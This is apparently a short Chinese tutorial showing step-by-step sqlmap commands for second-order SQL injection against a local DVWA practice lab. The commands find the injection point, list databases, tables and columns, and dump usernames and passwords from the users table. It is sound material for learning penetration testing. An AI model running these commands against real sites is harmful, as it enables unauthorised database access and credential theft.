Sqlmap 高级注入,抓包,然后保存数据到1.txt

1.判断注入点

sqlmap -r /root/1.txt -p id  --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/"  --level  2  #level是注入的等级,默认是1

2.爆数据库

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dbs

3.爆表

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --tables -D "dvwa"

4. 爆字段

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --columns -D "dvwa" -T "users"

5.爆帐号密码

sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 --dump -D "dvwa" -T "users" -C "user,password"

最新文章

  1. MVC中使用内建的HTML辅助方法产生表单元素提交表单与button按钮事件的陷阱
  2. Tomcat的目录结构及用途
  3. 动态数组 - ArrayList
  4. 根据之前的博文,我把给同学做的三子棋小游戏的代码发出来,只是界面很丑很丑,AI算法很笨很笨,过几天我传到网盘上,提供大家下载娱乐
  5. Actions 动作集
  6. [转载]值得推荐的C/C++框架和库
  7. Windows 端口和任务 查看 相关命令
  8. IDEA插件和快捷设置
  9. Esp8266
  10. 用JS编写一个函数,返回数组中重复出现过的元素
  11. jquery serializeArray()、serialize()增加数据
  12. WSL优化 (Windows Subsystem for Linux) Linux子系统优化配置
  13. 处理json大文件
  14. [leetcode]47. Permutations全排列(给定序列有重复元素)
  15. react与fetch
  16. (7)Pool进程池
  17. DOM操作之属性和样式操作
  18. 张高兴的 Windows 10 IoT 开发笔记:使用 MAX7219 驱动数码管
  19. Python 访问dict
  20. Android实战技巧之三十八:Handler使用中可能引发的内存泄漏

热门文章

  1. VS2010-MFC(常用控件:按钮控件的编程实例)
  2. JS程序的基本语法
  3. 百度跨域搜索demo
  4. 普及组R4
  5. netty DelimiterBasedFrameDecoder
  6. select函数使用
  7. /bin /usr/bin /sbin /usr/sbin 目录的作用
  8. 2019-11-7-C#-dotnet-线程不安全的弱引用缓存
  9. 2019-9-23-asp-dotnet-core-3.0-接口返回-json-使用-PascalCase-格式
  10. sqllocaldb